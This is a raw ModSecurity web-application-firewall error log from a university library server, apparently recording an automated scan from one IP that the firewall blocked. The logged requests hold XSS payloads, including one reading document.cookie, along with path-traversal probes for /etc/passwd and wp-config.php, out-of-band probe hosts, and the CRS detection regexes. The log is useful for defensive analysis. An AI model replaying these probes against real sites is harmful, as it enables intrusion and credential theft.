[Tue Aug 29 11:51:26.793566 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAkyyFUAAAAW"]
[Tue Aug 29 11:51:27.032086 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAmQ-xsAAAAb"]
[Tue Aug 29 11:51:27.600982 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAmQ-x0AAAAb"]
[Tue Aug 29 11:51:28.620852 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAjdQVAAAAAZ"]
[Tue Aug 29 11:51:28.922756 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAnHQe0AAAAT"]
[Tue Aug 29 11:51:28.935826 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAmHd-gAAAAz"]
[Tue Aug 29 11:51:29.557446 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAnTlK0AAAAA"]
[Tue Aug 29 11:51:30.607964 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAnDFzcAAAAM"]
[Tue Aug 29 11:51:30.618093 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAmNp5kAAAAQ"]
[Tue Aug 29 11:51:30.775455 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAnIlhkAAAAV"]
[Tue Aug 29 11:51:31.553303 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAjdQVkAAAAZ"]
[Tue Aug 29 11:51:32.665091 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15VMCo-f0AAAkr0HIAAAAC"]
[Tue Aug 29 11:51:33.691402 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VcCo-f0AAAnZfDEAAAAG"]
[Tue Aug 29 11:51:34.868860 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAmQ-zsAAAAb"]
[Tue Aug 29 11:51:35.085528 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnf3k0AAAAM"]
[Tue Aug 29 11:51:35.127021 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnd2@YAAAAI"]
[Tue Aug 29 11:51:35.632463 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAm7nAMAAAAE"]
[Tue Aug 29 11:51:35.695079 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15V8Co-f0AAAm7nAYAAAAE"]
[Tue Aug 29 11:51:39.591285 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAnmT1YAAAAd"]
[Tue Aug 29 11:51:40.752128 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnkwbsAAAAY"]
[Tue Aug 29 11:51:42.606572 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAnd3AUAAAAI"]
[Tue Aug 29 11:51:44.548103 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAmLPVYAAAAN"]
[Tue Aug 29 11:51:45.561261 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAnIljAAAAAV"]
[Tue Aug 29 11:51:47.547876 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAfWOIYAAAAL"]
[Tue Aug 29 11:51:48.626939 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnqj8AAAAAC"]
[Tue Aug 29 11:51:48.723449 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAnmT3UAAAAd"]
[Tue Aug 29 11:51:50.715708 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAnIlkUAAAAV"]
[Tue Aug 29 11:51:51.613422 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAlUlmcAAAA0"]
[Tue Aug 29 11:51:51.613525 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAmQ-2AAAAAb"]
[Tue Aug 29 11:51:53.892065 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAn958IAAAAD"]
[Tue Aug 29 11:51:53.906270 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri 